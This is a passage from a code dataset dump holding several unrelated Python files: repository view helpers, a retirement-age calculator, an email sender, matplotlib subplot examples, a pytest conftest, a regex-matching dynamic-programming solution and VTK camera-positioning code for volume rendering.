datetime.datetime.fromtimestamp(os.path.getmtime(books_models_filename))\nbooks_models_md5sum = md5sum(books_models_filename)\n\ndef unapi_modified(request):\n 'last-modification time for unapi; format list or metadata for a single item'\n item_id = request.GET.get('id', None)\n\n # if no id, just lists available formats\n if item_id is None:\n # configuration is based on Volume class definition, so should only\n # change if the file has changed\n return books_models_modified\n\n # metadata for a specific record\n else:\n return volume_modified(request, item_id)\n\ndef unapi_etag(request):\n 'etag for unapi'\n item_id = request.GET.get('id', None)\n\n # if no id, just lists available formats\n if item_id is None:\n # configuration is based on Volume class definition, so should only\n # change if the file has changed\n return books_models_md5sum\n\n # metadata for a specific record\n else:\n fmt = request.GET.get('format', None)\n if fmt == 'rdf_dc':\n return datastream_etag(request, item_id, Volume.dc.id, type=Volume)\n\n\ndef datastream_lastmodified(request, pid, dsid, type):\n repo = Repository()\n try:\n obj = repo.get_object(pid, type=type)\n ds = obj.getDatastreamObject(dsid)\n if ds and ds.exists:\n return ds.created\n except RequestFailed:\n pass\n\ndef pdf_etag(request, pid):\n 'etag for Volume PDF datastream'\n return datastream_etag(request, pid, Volume.pdf.id)\n\ndef pdf_lastmodified(request, pid):\n 'last modified for Volume PDF datastream'\n return datastream_lastmodified(request, pid, Volume.pdf.id, Volume)\n\ndef ocr_etag(request, pid):\n 'etag for Volume OCR datastream'\n return datastream_etag(request, pid, VolumeV1_0.ocr.id)\n\ndef ocr_lastmodified(request, pid):\n 'last modified for Volume OCR datastream'\n return datastream_lastmodified(request, pid, VolumeV1_0.ocr.id, Volume)\n\n# TODO: consider full text etag/lastmodified methods that would work\n# for both volume v1.0 and v1.1; if v1.0, simple returns ocr methods\n# above; otherwise, no etag is available but last-modified could be pulled\n# from most recent solr indexed page.\n# (If this requires additional fedora api calls to determine type,\n# may be too costly.)\n\ndef page_image_etag(request, pid, **kwargs):\n 'etag for Page image datastream'\n return datastream_etag(request, pid, Page.image.id, type=Page)\n\ndef page_image_lastmodified(request, pid, **kwargs):\n 'last modified for Page image datastream'\n return datastream_lastmodified(request, pid, Page.image.id, type=Page)\n\n","sub_path":"readux/books/view_helpers.py","file_name":"view_helpers.py","file_ext":"py","file_size_in_byte":8883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"405750133","text":"##################################\r\n# Full Retirement Age Program\r\n# Cesar Carrillo\r\n##################################\r\n\r\n# Libraries\r\nimport math;\r\n\r\n# Global Variables\r\nRETIREMENT_AGES = [ (1937, (65, 0)),\r\n (1938, (65, 2)),\r\n (1939, (65, 4)),\r\n (1940, (65, 6)),\r\n (1941, (65, 8)),\r\n (1942, (65, 10)),\r\n (1943, (66, 0)),\r\n (1954, (66, 0)),\r\n (1955, (66, 2)),\r\n (1956, (66, 4)),\r\n (1957, (66, 6)),\r\n (1958, (66, 8)),\r\n (1959, (66, 10)),\r\n (1960, (67, 0)) ];\r\n\r\nMONTH_NAMES = [ \"January\",\r\n \"February\",\r\n \"March\",\r\n \"April\",\r\n \"May\",\r\n \"June\",\r\n \"July\",\r\n \"August\",\r\n \"September\",\r\n \"October\",\r\n \"November\",\r\n \"December\", ];\r\n\r\n# Input for integers only\r\ndef inputInt(prompt):\r\n integer = input(prompt);\r\n\r\n # Verify string\r\n if(integer.isnumeric()):\r\n return int(integer); # if int then return it\r\n else:\r\n print(\"\\nPlease enter an integer value\\n\");\r\n return inputInt(prompt); # if not call again\r\n\r\n# Returns the retirement age and month (YEAR, MONTH)\r\ndef findRetirementInfo(birthYear):\r\n # Go through the RETIREMENT_AGES list to\r\n # find and return the appropriate information\r\n for i in range(len(RETIREMENT_AGES)):\r\n year = RETIREMENT_AGES[i][0];\r\n age = RETIREMENT_AGES[i][1];\r\n\r\n if(birthYear == year):\r\n return age; # an exact match is found so return\r\n\r\n # because the list has a an ~11 year gap with no\r\n # months added this was the best way I thought to\r\n # check if the birthYear falls in that range\r\n # *for 1943 - 1954\r\n\r\n # make sure we are not at the end of the list\r\n # if so then return as there are no more years to check\r\n if(i >= len(RETIREMENT_AGES) - 1):\r\n return age;\r\n else:\r\n # check the current year (i) with the next year\r\n # if we are in between these years then we fall in\r\n # the range\r\n yearNext = RETIREMENT_AGES[i + 1][0];\r\n\r\n if(birthYear > year and birthYear < yearNext):\r\n return age;\r\n\r\n# Get the birth info from user\r\ndef requestBirthInfo():\r\n year = inputInt(\"Birth Year: \");\r\n month = inputInt(\"Birth Month: \");\r\n\r\n # the return order goes YEAR (0) then MONTH (1)\r\n return (year, month);\r\n\r\n# Calculate and return the retirementAge\r\ndef calculateRetirementDate(birthInfo, retirementInfo):\r\n # Calculate the retirement year and month by\r\n # adding the birthInfo and retirementInfo\r\n # in every function related to this program\r\n # the return order goes YEAR (0) then MONTH (1)\r\n retirementYear = retirementInfo[0] + birthInfo[0];\r\n retirementMonth = birthInfo[1] + retirementInfo[1];\r\n\r\n # If we are more than 12 months then adjust the year and months\r\n if(retirementMonth > 12):\r\n retirementYear += math.floor(retirementMonth / 12);\r\n retirementMonth -= 12;\r\n\r\n return (retirementYear, retirementMonth);\r\n\r\n# Returns month name using given month number\r\ndef getMonthName(month):\r\n return MONTH_NAMES[month - 1];\r\n\r\n# Prints the retirement information in a sentence\r\ndef printRetirementInfo(retirementInfo):\r\n retirementAge = retirementInfo[0];\r\n retirementMonth = retirementInfo[1];\r\n\r\n # Print Text\r\n retirementText = str(retirementAge);\r\n\r\n # Display months?\r\n if(retirementMonth > 0):\r\n retirementText += \" and \" + str(retirementMonth) + \" months\";\r\n\r\n print(\"Your full retirement age is\", retirementText);\r\n\r\n# Print the retirement date in a sentence\r\ndef printRetirementDate(retirementDate):\r\n print(\"this will be in\", getMonthName(retirementDate[1]), \"of\", retirementDate[0]);\r\n\r\n\r\n# Program Entry point\r\ndef main():\r\n\r\n running = True;\r\n\r\n print(\"Social Security Full Retirement Age Calculator\");\r\n\r\n while(running):\r\n print(\"-----------------------------------\");\r\n\r\n # Request info\r\n birthInfo = requestBirthInfo();\r\n\r\n # Calculate retirement age/month\r\n retirementInfo = findRetirementInfo(birthInfo[0]);\r\n\r\n # Print the info\r\n printRetirementInfo(retirementInfo);\r\n\r\n # Calculate the retirement date\r\n retirementDate = calculateRetirementDate(birthInfo, retirementInfo);\r\n\r\n # Print the retirement date\r\n printRetirementDate(retirementDate);\r\n\r\n # Ask if the program should keep running\r\n exitProgram = input(\"\\nExit program? (Y/N) \").lower();\r\n\r\n if(exitProgram == 'y' or exitProgram == 'yes'):\r\n running = False;\r\n\r\n\r\nmain(); # Run\r\n","sub_path":"retirementAge.py","file_name":"retirementAge.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"557012191","text":"from email.message import EmailMessage\nfrom smtplib import SMTP\nfrom abc import ABCMeta, abstractmethod\nimport os\n\nclass EmailSender(metaclass=ABCMeta):\n @abstractmethod\n def send(self,msg: EmailMessage):\n pass\n\nclass SimpleEmailSender(EmailSender):\n\n SMTP_SERVER_PORT:str=\"SMTP_SERVER_PORT\"\n\n @classmethod\n def send(cls,msg: EmailMessage):\n server_port = os.environ[cls.SMTP_SERVER_PORT]\n servers = server_port.split(':')\n with SMTP(servers[0],int(servers[1])) as s:\n s.send_messagatsuogae(msg)\n\nclass EmailBuilder:\n\n _registered_email_sender: EmailSender = None\n\n @classmethod\n def send_html_message(cls, from_address: str,subject: str, to_address: list[str]=None, cc_address: list[str]=None,\n body: str=None, attachment_files: list[str] = None) -> EmailMessage:\n email = EmailMessage()\n email['Subject'] = subject\n email['From'] = from_address\n if to_address is not None and len(to_address) > 0 :\n email['To'] = '.'.join(to_address)\n if cc_address is not None and len(cc_address) > 0:\n email['Cc'] = '.'.join(to_address)\n\n if body is not None:\n email.set_content(body, subtype='html')\n\n if attachment_files is not None and len(attachment_files)>1 :\n for filepath in attachment_files:\n mime_type= cls.__get_mime_type(filepath)\n with open(filepath, 'rb') as content_file:\n content = content_file.read()\n email.add_attachment(content,\n maintype=mime_type['maintype'], subtype=mime_type['subtype'],\n filename=filepath)\n\n if cls._registered_email_sender is None:\n SimpleEmailSender().send(email)\n else:\n cls._registered_email_sender.send(email)\n\n return email\n\n @classmethod\n def register_mail_sender(cls, custom_mail_sender: EmailSender):\n cls._registered_email_sender=custom_mail_sender\n\n @classmethod\n def __get_mime_type(cls, path: str) -> dict:\n if path == '':\n return None\n parts = path.split('.')\n if len(parts)<2:\n return None\n\n extension = parts[len(parts)-1]\n\n applications = ['zip','pdf']\n texts=['txt']\n images=['png','jpeg','gif']\n\n if extension in applications:\n return dict(maintype='application',subtype=extension)\n elif extension in images:\n return dict(maintype='image',subtype=extension)\n elif extension=='jpg':\n return dict(maintype='image', subtype='jpeg')\n elif extension=='html':\n return dict(maintype='text',subtype='html')\n elif extension in texts:\n return dict(maintype='text',subtype='plain')\n else:\n return dict(maintype='application',subtype='octet-stream')","sub_path":"tests/resources/source/folder1/email_sender.py","file_name":"email_sender.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"155023588","text":"# coding:iso-8859-9 Türkçe\r\n# p_31508.py: Izgaralar ile çoklu fonksiyonları çizme örneği.\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as mp\r\nimport matplotlib.gridspec as mg\r\nfrom p_315 import Renk\r\n\r\nmp.style.use (\"dark_background\")\r\nmp.figure (figsize=(7, 4))\r\nızgara = mg.GridSpec (3, 3)\r\nX = np.linspace (0, 2 * np.pi, 200, endpoint=True)\r\nF1 = 2.8 * np.cos (X)\r\nF2 = 5 * np.sin (X)\r\nF3 = 0.3 * np.sin (X)\r\n\r\naltşekil1 = mp.subplot (ızgara [0, :])\r\naltşekil1.plot (X, F1, 'r-', X, F2)\r\n\r\naltşekil2 = mp.subplot (ızgara [1, :-1])\r\naltşekil2.plot (X, F3)\r\n\r\naltşekil3 = mp.subplot (ızgara [1:, -1])\r\naltşekil3.plot ([0,1,2,3,4], [0,1,10,100,1000], 'b-')\r\n\r\naltşekil4 = mp.subplot (ızgara [-1, 0])\r\naltşekil4.plot ([0,1,2,3,4], [51, 48, 0, 42, 60], 'r-')\r\n\r\naltşekil5 = mp.subplot (ızgara [-1, -2])\r\naltşekil5.plot ([0,1,2,3,4], [7.5, 7, 2, 1, 0])\r\n\r\nmp.tight_layout()\r\nmp.show()\r\n#-------------------------------------------------------------------------------------------------\r\n\r\n\r\nşekil = mp.figure (figsize=(7, 4))\r\nşekil.set_facecolor (Renk.renk())\r\nızgara = mg.GridSpec (3, 3)\r\nX = np.linspace (0, 2 * np.pi, 200, endpoint=True)\r\nF1 = 2.8 * np.cos (X)\r\nF2 = 5 * np.sin (X)\r\nF3 = 0.3 * np.sin (X)\r\n\r\naltşekil1 = şekil.add_subplot (ızgara [0, 0:3])\r\naltşekil1.set_facecolor (Renk.renk())\r\naltşekil1.plot (X, F1, 'r-', X, F2, \"y-\")\r\n\r\naltşekil2 = şekil.add_subplot (ızgara [1, 0:2])\r\naltşekil2.set_facecolor (Renk.renk())\r\naltşekil2.plot (X, F3, \"g\")\r\n\r\naltşekil3 = şekil.add_subplot (ızgara [1:3, 2])\r\naltşekil3.set_facecolor (Renk.renk())\r\naltşekil3.plot ([0,1,2,3,4], [0,1,10,100,1000], 'b-')\r\n\r\naltşekil4 = şekil.add_subplot (ızgara [2, 0])\r\naltşekil4.set_facecolor (Renk.renk())\r\naltşekil4.plot ([0,1,2,3,4], [51, 48, 0, 42, 60], 'r-')\r\n\r\naltşekil5 = şekil.add_subplot (ızgara [2, 1])\r\naltşekil5.set_facecolor (Renk.renk())\r\naltşekil5.plot ([0,1,2,3,4], [7.5, 7, 2, 1, 0], \"m\")\r\n\r\nşekil.tight_layout()\r\nmp.show()\r\n","sub_path":"Bernd Klein (520) ile Python/p_31508.py","file_name":"p_31508.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"448488727","text":"# -*- coding: utf-8 -*-\n\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\ndef index(req):\n return render(req, 'sinabro/index.html', {'title': 'Sinabro'})\n\ndef convert(req, target, word):\n import json\n from .models import Word\n\n if target in ['south', 'north']:\n query = \"\"\"\n SELECT\n *\n FROM\n sinabro_word\n WHERE\n REPLACE(%s, ' ', '')='%s'\n \"\"\" % ('south' if target == 'north' else 'north', word.replace(' ', ''))\n\n query_result = Word.objects.raw(query)\n matched_words = []\n for q in query_result:\n matched_words.append({\n 'word': q.south if target == \"south\" else q.north,\n 'description': {'word': q.south, 'mean': q.description} if q.description is not None and len(q.description) else dictionary(q.south)\n })\n\n if len(matched_words):\n result = {\n 'code': 200,\n 'target': target,\n 'original_word': word,\n 'converted_word': matched_words\n }\n else:\n result = {\n 'code': 404,\n 'err_message': 'Word not found'\n }\n else:\n result = {\n 'code': 400,\n 'err_message': 'Invalid parameters'\n }\n\n return HttpResponse(json.dumps(result))\n\ndef dictionary(word):\n from urllib.request import urlopen\n from urllib.parse import quote\n import xml.etree.ElementTree as ET\n from .models import Word\n\n key = \"F617DC1EF4D10410220D828231595C24\"\n quoted = quote(word)\n url = \"http://opendict.korean.go.kr/api/search\"\n params = {'key': key, 'q': quoted}\n\n first = True\n for k, v in params.items():\n if first:\n url += '?'\n first = False\n else:\n url += '&'\n url += k + '=' + v\n\n response = urlopen(url).read().decode('utf-8')\n parsed = ET.fromstring(response).findall('item')\n result = [{'word': item.findtext('word').replace('^', ' ').replace('-', ''), 'mean': item.find('sense').findtext('definition')} for item in parsed]\n\n original_word = Word.objects.filter(south=word)\n for orig in original_word:\n orig.description = result[0].get('mean')\n orig.save()\n\n return result[0]\n","sub_path":"sinabro/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"587287774","text":"\"\"\"Defines fixtures available to all tests.\"\"\"\nimport os\nimport pathlib\nimport pytest\n\nfrom flask import current_app\nfrom reddit.app import create_app\nfrom reddit.extensions import db\nfrom reddit import subreddits, threads, user, votes\nfrom unittest.mock import patch\n\n\n@pytest.fixture(scope='session')\ndef test_client(request):\n #os.environ['FLASK_ENV'] = 'testing'\n\n mock_app_event_init = patch('reddit.app.event_publisher.init_app')\n mock_db_send_event = patch('reddit.database.event_publisher.send_event')\n mock_db_cache = patch('reddit.database.cache.set')\n\n mock_app_event_init.start()\n mock_db_send_event.start()\n mock_db_cache.start()\n\n mock_app_event_init.return_value = True\n mock_db_send_event.return_value = True\n\n #mock_db_cache.set = log_mock\n\n app = create_app()\n test_client = app.test_client()\n ctx = app.app_context()\n ctx.push()\n\n request.addfinalizer(lambda: ctx.pop())\n\n yield test_client\n\n\n@pytest.fixture(scope=\"session\")\ndef test_database(request, test_client):\n db.create_all()\n\n def tear_down():\n db.drop_all()\n # Hack for sqlite always placing database in app directory rather than root\n database_uri = current_app.config['SQLALCHEMY_DATABASE_URI']\n if database_uri.startswith('sqlite'):\n db_path = database_uri.strip('sqlite:///')\n db_name = pathlib.Path(db_path).name\n for dirname, _, filenames in os.walk('.'):\n for filename in filenames:\n if filename == db_name:\n os.remove(os.path.join(dirname, filename))\n return\n\n request.addfinalizer(tear_down)\n\n yield db\n\n\n@pytest.fixture(scope='module')\ndef test_data(test_database):\n user1 = user.models.User(username='user_test1', email='test1@gmail.com', password='password')\n user2 = user.models.User(username='user_test2', email='test2@gmail.com', password='password')\n user1.save()\n user2.save()\n\n sub1 = subreddits.models.Subreddit(\n name='test_sub1',\n description='A subreddit for testing.',\n creator_id=user1.id\n )\n\n thread1 = threads.models.Thread(\n title='test_thread',\n description='A thread for testing',\n author_id=user1.id,\n subreddit=sub1\n )\n\n data = {'users': [user1, user2],\n 'subreddits': [sub1],\n 'threads': [thread1]}\n\n for key, models in data.items():\n for instance in models:\n if key != 'users':\n instance.save()\n\n yield data\n\n for key, models in data.items():\n for instance in models:\n instance.delete()\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"79314695","text":"\"\"\"\n// Time Complexity : O(len(s)*len(p))\n// Space Complexity : O(len(s)*len(p))\n// Did this code successfully run on Leetcode : Yes\n// Any problem you faced while coding this : No\n\n// Your code here along with comments explaining your approach\nAlgorithm Explanation\nGiven below - DP\n\"\"\"\nclass Solution:\n def isMatch(self, s: str, p: str) -> bool:\n \"\"\"\n Main idea is we can break down each ch* into two decision making mode - 0 char or 1 char, since we can expand the string on * at each recursive level, we can get overlapping subproblems with result string/intermediate string acts as subproblem ->DP\n Tabulation method\n - Create a dp array, dp[s.length+1][p.length+1] consisting of False values\n - dp[0][0] = T (blank matches blank)\n - Fill the first row of dp\n If the last element of p == '*'\n dp[0][j] = dp[0][j-2] // go 2 places back such that string before start of * is covered eg _c*a* _c* (for a*) would have been computed before\n - For row = 1 to dp.length\n For col = 1 to dp[0].length\n If current char is not a star \n - s[row-1] == p[col-1] \n dp[row][col] = dp[row-1][col-1]\n else:\n dp[row][col] = dp[row][col-2] #fetching the value corresponding to zero for *\n if s[row-1] == p[col-2] or p[col-2] == '.': # case for considering 1\n dp[row][col] = dp[row][col] or dp[row-1][col]\n \n - return dp[dp.length-1][dp[0].length-1] \n \"\"\"\n dp = [[False for _ in range(len(p)+1)] for _ in range(len(s)+1)]\n dp[0][0] = True\n for j in range(1,len(dp[0])):\n if p[j-1] == '*':\n dp[0][j] = dp[0][j-2]\n \n for i in range(1,len(dp)):\n for j in range(1,len(dp[0])):\n #current char in pattern not a star\n if s[i-1] == p[j-1] or p[j-1] == '.':\n dp[i][j] = dp[i-1][j-1]\n elif p[j-1] == '*':\n dp[i][j] = dp[i][j-2] # getting the value for 0 case\n \n #check for case 1 for *\n if s[i-1] == p[j-2] or p[j-2] == '.':\n dp[i][j] |= dp[i-1][j]\n return dp[len(dp)-1][len(dp[0])-1]","sub_path":"regular_expression.py","file_name":"regular_expression.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"238188983","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n This Class is mainly to do camera position for VR and MPR.\n\"\"\"\nimport numpy as np\nimport render_common\nfrom vtk import *\n\n\nclass FovInfo:\n def __init__(self):\n self.ExtentLen = 1 # milimeter\n self.Spacing = 1 # spacing\n self.vecInPatient = [0, 0, 1] # real Ori in Patient Coord\n self.vecInPatientOrth = [0, 0, 1]\n self.vVolumeCoord = render_common.AxisType.Z_POS\n\n self._axis_head = [0.0, 0.0, 1.0]\n self._axis_left = [1.0, 0.0, 1.0]\n self._axis_anterior = [0.0, -1.0, 0.0]\n\n def get_fov_info(self, dim, spacing, orientation, AxisType, AxisPosType):\n \"\"\"\n According to AxisType, Get FovInfo Value\n :param dim:\n :param spacing:\n :param orientation:\n :param AxisType: X_NEG = 0 X_POS = 1 Y_NEG = 2 Y_POS = 3 Z_NEG = 4 Z_POS = 5\n :param AxisPosType: POS_RIGTH = 0 POS_LEFT = 1 POS_ANTERIOR = 2 POS_POSTERIOR = 3 POS_FOOT = 4 POS_HEAD = 5\n :return:\n \"\"\"\n if AxisType is render_common.AxisType.X_POS:\n self.ExtentLen = dim[0] * spacing[0]\n self.Spacing = spacing[0]\n self.vecInPatient = orientation[0]\n self.vecInPatientOrth = render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.X_POS\n elif AxisType is render_common.AxisType.X_NEG:\n self.ExtentLen = dim[0] * spacing[0]\n self.Spacing = spacing[0]\n self.vecInPatient = - orientation[0]\n self.vecInPatientOrth = - render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.X_NEG\n elif AxisType is render_common.AxisType.Y_POS:\n self.ExtentLen = dim[1] * spacing[1]\n self.Spacing = spacing[1]\n self.vecInPatient = orientation[1]\n self.vecInPatientOrth = render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.Y_POS\n elif AxisType is render_common.AxisType.Y_NEG:\n self.ExtentLen = dim[1] * spacing[1]\n self.Spacing = spacing[1]\n self.vecInPatient = - orientation[1]\n self.vecInPatientOrth = render_common.AxisValue.axis_vlaue[AxisPosType] * -1\n self.vVolumeCoord = render_common.AxisType.Y_NEG\n elif AxisType is render_common.AxisType.Z_POS:\n self.ExtentLen = dim[2] * spacing[2]\n self.Spacing = spacing[2]\n self.vecInPatient = orientation[2]\n self.vecInPatientOrth = render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.Z_POS\n elif AxisType is render_common.AxisType.Z_NEG:\n self.ExtentLen = dim[2] * spacing[2]\n self.Spacing = spacing[2]\n self.vecInPatient = - orientation[2]\n self.vecInPatientOrth = - render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.Z_NEG\n return self\n\n\ndef cal_nearest_axis(dim, spacing, orientation, FovHead, FovLeft, FovAnterior):\n \"\"\"\n By Calculating the projection of volume orientation in the patient XYZ Axis, we can get the volume 是\n 体数据是侧卧,还是背卧,还是正躺等\n 确定与病人头方向、左方向、前方向最为接近的volume坐标系下的坐标轴及三个轴方向在病人坐标系下实际方向\n :param dim:\n :param spacing:\n :param orientation:\n :param FovHead: 与病人头方向最为接近的volume坐标系下的坐标轴及该轴方向在病人坐标系下实际方向\n :param FovLeft: 与病人左方向最为接近的volume坐标系下的坐标轴及该轴方向在病人坐标系下实际方向\n :param FovAnterior: 与病人前方向最为接近的volume坐标系下的坐标轴及该轴方向在病人坐标系下实际方向\n :return:\n \"\"\"\n left_patient_coord = [1, 0, 0]\n anterior_patient_coord = [0, -1, 0]\n head_patient_coord = [0, 0, 1]\n orientation[0] = orientation[0] / np.linalg.norm(orientation[0]) # normalize of orientation\n orientation[1] = orientation[1] / np.linalg.norm(orientation[1]) # normalize of orientation\n orientation[2] = orientation[2] / np.linalg.norm(orientation[2]) # normalize of orientation\n volume_x_head = np.dot(orientation[0], head_patient_coord)\n volume_y_head = np.dot(orientation[1], head_patient_coord)\n volume_z_head = np.dot(orientation[2], head_patient_coord)\n volume_x_left = np.dot(orientation[0], left_patient_coord)\n volume_y_left = np.dot(orientation[1], left_patient_coord)\n volume_z_left = np.dot(orientation[2], left_patient_coord)\n volume_x_anterior = np.dot(orientation[0], anterior_patient_coord)\n volume_y_anterior = np.dot(orientation[1], anterior_patient_coord)\n volume_z_anterior = np.dot(orientation[2], anterior_patient_coord)\n\n # Priority is TRA > COR > SAG.\n if np.abs(volume_z_head) > np.abs(volume_y_head) and np.abs(np.abs(volume_z_head)) > np.abs(volume_x_head):\n if volume_z_head > 0:\n FovHead.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovHead.vVolumeCoord = render_common.AxisType.Z_NEG\n if np.abs(volume_x_left) > np.abs(volume_y_left):\n if volume_x_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.X_NEG\n if volume_y_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.Y_NEG\n else:\n if volume_y_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.Y_NEG\n if volume_x_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.X_NEG\n elif np.abs(volume_y_head) > np.abs(volume_x_head) and np.abs(volume_y_head) > np.abs(volume_z_head):\n if volume_y_head > 0:\n FovHead.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovHead.vVolumeCoord = render_common.AxisType.Y_NEG\n if np.abs(volume_x_left) > np.abs(volume_z_left):\n if volume_x_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.X_NEG\n if volume_z_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.Z_NEG\n else:\n if volume_z_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.Z_NEG\n if volume_z_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.X_NEG\n else:\n if volume_x_head > 0:\n FovHead.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovHead.vVolumeCoord = render_common.AxisType.X_NEG\n if np.abs(volume_y_left) > np.abs(volume_z_left):\n if volume_y_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.Y_NEG\n if volume_z_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.Z_NEG\n else:\n if volume_z_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.Z_NEG\n if volume_y_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.Y_NEG\n\n # int(render_common.PatientPositionType.POS_HEAD)\n fov_head = FovHead.get_fov_info(dim, spacing, orientation, FovHead.vVolumeCoord, 5)\n # int(render_common.PatientPositionType.POS_LEFT)\n fov_left = FovLeft.get_fov_info(dim, spacing, orientation, FovLeft.vVolumeCoord, 1)\n # int(render_common.PatientPositionType.POS_ANTERIOR)\n fov_anterior = FovAnterior.get_fov_info(dim, spacing, orientation, FovAnterior.vVolumeCoord, 2)\n return fov_head, fov_left, fov_anterior\n\n\ndef get_default_camera_lookat(fovinfo_head, fovinfo_left, fovinfo_anterior, pos_type, center):\n \"\"\"\n According to fovinfo_head, fovinfo_left, fovinfo_anterior to get camera lookat point\n :param fovinfo_head:\n :param fovinfo_left:\n :param fovinfo_anterior:\n :param pos_type: PositionType\n :param ptlookat:\n :return:\n \"\"\"\n look_at_point = center\n if pos_type is render_common.PositionType.SAGITTAL:\n view_dir = - fovinfo_left.vecInPatient\n view_dir = view_dir / np.linalg.norm(view_dir)\n # +0.5是为了消除double数计算所带来的精度误差\n sag_dim = int(fovinfo_left.ExtentLen / fovinfo_left.Spacing + 0.5)\n if (sag_dim % 2) is True:\n look_at_point -= view_dir * 0.5 * fovinfo_left.Spacing\n elif pos_type is render_common.PositionType.TRANSVERSAL:\n view_dir = - fovinfo_head.vecInPatient\n view_dir = view_dir / np.linalg.norm(view_dir)\n tra_dim = int(fovinfo_head.ExtentLen / fovinfo_head.Spacing + 0.5)\n if (tra_dim % 2) is True:\n look_at_point -= view_dir * 0.5 * fovinfo_head.Spacing\n else:\n view_dir = - fovinfo_anterior.vecInPatient\n view_dir = view_dir / np.linalg.norm(view_dir)\n ant_dim = int(fovinfo_anterior.ExtentLen / fovinfo_anterior.Spacing + 0.5)\n if (ant_dim % 2) is True:\n look_at_point -= view_dir * 0.5 * fovinfo_anterior.Spacing\n return look_at_point\n\n\ndef check_orthogonal(orientation):\n \"\"\"\n Check Volume is Orthogonal. If the volume is not orthogonal , then eys_dir should be re-calculated for MPRs\n :param orientation:\n :return:\n \"\"\"\n MIN_TOLERANCE = 0.000001\n dot_x_y = np.dot(orientation[0], orientation[1])\n dot_x_z = np.dot(orientation[0], orientation[2])\n dot_y_z = np.dot(orientation[1], orientation[2])\n\n if dot_x_y > MIN_TOLERANCE or dot_x_z > MIN_TOLERANCE or dot_y_z > MIN_TOLERANCE:\n return False\n else:\n return True\n\n\ndef get_default_mpr_camera(dim, spacing, orientation, center, pos_type, same_aspect_ratio=False):\n \"\"\"\n\n :param dim:\n :param spacing:\n :param orientation:\n :param pos_type: render_common.PositionType.SAGITTAL: render_common.PositionType.TRANSVERSAL:\n :param camera: camera is the output result\n :param same_aspect_ratio: when TRA(横), COR(冠), SAG(矢), should be in the same scale, then the flag should be true\n :return:\n \"\"\"\n # Step1: Calculate the nearest axis of volume x-y-z in patient coord.\n # camera =render.GetActiveCamera()\n camera = vtk.vtkCamera()\n fov_head = FovInfo()\n fov_left = FovInfo()\n fov_anterior = FovInfo()\n cal_nearest_axis(dim, spacing, orientation, fov_head, fov_left, fov_anterior)\n\n # Step2: Calculate the position of camera look at point by different pos_type\n # pos_look_at = [0, 0, 0]\n pos_look_at = get_default_camera_lookat(fov_head, fov_left, fov_anterior, pos_type, center)\n\n # Step3: Get max of extent of the volume\n extent = [dim[0] * spacing[0], dim[1] * spacing[1], dim[2] * spacing[2]]\n # max_extent = np.max(extent)\n max_extent = np.linalg.norm(extent, ord=2) * 0.5\n # Step4: Calculate eye_dir and up_dir for different position type of MPR (TRA, COR,SAG)\n b_orthogonal = check_orthogonal(orientation)\n if pos_type is render_common.PositionType.SAGITTAL:\n if same_aspect_ratio is False:\n ortho_width = fov_anterior.ExtentLen\n ortho_height = fov_head.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_left.vecInPatient\n else:\n eye_dir = np.cross(fov_head.vecInPatient, fov_anterior.vecInPatient)\n up_dir = fov_head.vecInPatient\n elif pos_type is render_common.PositionType.TRANSVERSAL:\n if same_aspect_ratio is False:\n ortho_width = fov_left.ExtentLen\n 